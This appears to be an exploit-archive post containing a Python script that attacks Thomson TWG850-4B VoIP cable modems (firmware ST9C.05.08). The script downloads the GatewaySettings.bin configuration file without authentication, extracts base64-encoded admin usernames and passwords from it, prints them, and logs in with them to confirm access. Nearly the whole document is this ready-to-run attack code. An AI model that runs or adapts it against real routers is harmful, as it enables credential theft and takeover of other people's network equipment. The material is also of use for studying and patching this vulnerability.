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Thomsom Cable Modem TWG850-4B ST9C.05.08 Authentication Bypass

Posted on 04 September 2015

############################################################################### #+-//////////////////////////////////////////////////////////////////////////// #+- #+- Exploit Title: Thomson Wireless VoIP Cable Modem Arbitrary File Access #+- Date: October 22, 2013 #+- Author: Glaysson dos Santos #+- #+- Product: TWG850-4B Wireless VoIP Cable Modem #+- Software Version: ST9C.05.08 #+- Hardware Version: 2.1 #+- BOOT Revision: 2.1.7i #+- Standard Specification Compliant: DOCSIS 2.0 #+- Firmware Name: DWG850-4-9C.05.08-110217-S-1FF.bin #+- Firmware Build Time 19:19:19 Thu Feb 17 2011 #+- Severity: High #+- #+-\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ ################################################################################ import string import urllib2 import sys from time import sleep import base64 import binascii import os save = 'log_TWG8504B.txt' log = open(save,'w') bifi = 'GatewaySettings.bin' refi = 'RgComputers.asp' R_C = ("33[0;31m") G_C = ("33[1;32m") D_C = ("33[0m" ) def banner(): os.system('clear') print " Thomson Wireless VoIP Cable Modem DWG850 -4B (Software Version:ST9C.05.08)- Arbitrary File Read - 2013 - Glaysson dos Santos (0cn1) " def hr_data(filename, min=4): with open(filename, "rb") as f: result = "" for c in f.read(): if c in string.printable: result += c continue if len(result) >= min: yield result print >> log, result result = "" print "(+)- Others Informations Extracted Saved in %s, but you've a Admin Password :D "%(save) def checkcreds(router,username,password): auth_handler = urllib2.HTTPBasicAuthHandler() auth_handler.add_password(realm='Thomson', uri = router, user = username, passwd= password) opener = urllib2.build_opener(auth_handler) try: urllib2.install_opener(opener) status = urllib2.urlopen('%s/%s'%(router,refi)) print '(+)- [status:%s%s%s] Authenticated successfuly, Enjoy it!'%(G_C,status.code,D_C) except urllib2.URLError, e: if e.code == 401: print '(+)- [status:%s%s%s] Invalid Credentials! Try yourself in a browser.'%(R_C,e.code,D_C) def checkvuln(router): try: print '(+)- Checking if target is vulnerable...' req = urllib2.Request('%s/%s'%(router,bifi)) response = urllib2.urlopen(req) page = response.read() x = open(bifi,'wb') x.write(page) x.close() sleep(1) print '(+)- The target appears to be vulnerable, lets check it better!' print '(+)- Searching Credentials...' sleep(1) for s in hr_data(bifi): try: dec = base64.decodestring(s) if dec.find(':') != -1: user,passwd = dec.split(':') print '(+)- User: %s%s%s'%(G_C,user,D_C) print '(+)- Pass: %s%s%s'%(G_C,passwd,D_C) print '(+)- Checking if creds are OK...' checkcreds(router,user,passwd) except(binascii.Error): pass except urllib2.URLError, e: print '[$] hollyshit! the target is not vuln! o.O (%s%s%s)'%(R_C,e.reason[1],D_C) sys.exit(1) if __name__ == "__main__": banner() if len(sys.argv) != 2: print '[!] %sRun %s router IP%s '%(R_C,sys.argv[0],D_C) sys.exit(2) router = sys.argv[1] if not "http" in router: router = "http://"+(sys.argv[1]) checkvuln(router)